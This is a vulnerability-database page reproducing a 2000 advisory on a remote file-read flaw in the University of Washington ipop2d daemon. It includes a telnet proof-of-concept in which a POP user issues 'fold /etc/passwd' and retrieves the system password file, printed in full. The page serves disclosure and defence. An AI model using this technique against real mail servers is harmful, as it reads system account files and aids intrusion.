Vulners
Lucene search
University of Washington pop2d 4.46/4.51/4.54/4.55 Remote File Read Vulnerability
source: http://www.securityfocus.com/bid/1484/info
A vulnerability exists in versions of the ipop2d daemon, through version 4.55. ipop2d is part of the University of Washington imap package. Versions through 4.7c of the imap package are affected. Any user who has a pop account on the machine can view any world or group readable file on the file system. While on a shell account this is not a vulnerability, on a machine where a user only has POP access, this could result in the disclosure of information that might be useful in gaining information about other users on the system. This could in turn potentially be used to gain further access to the machine.
For this vulnerability to exist, the user must have an account on the system in question. This account does not need shell level access.
ipop2d, and the imap package, will run on many varieties of Unix and Unix-like operating systems.
[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark blehpasshere
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <[email protected]>
Received: (from root@localhost)
by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Status: RO
message is here...
acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: [email protected]
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1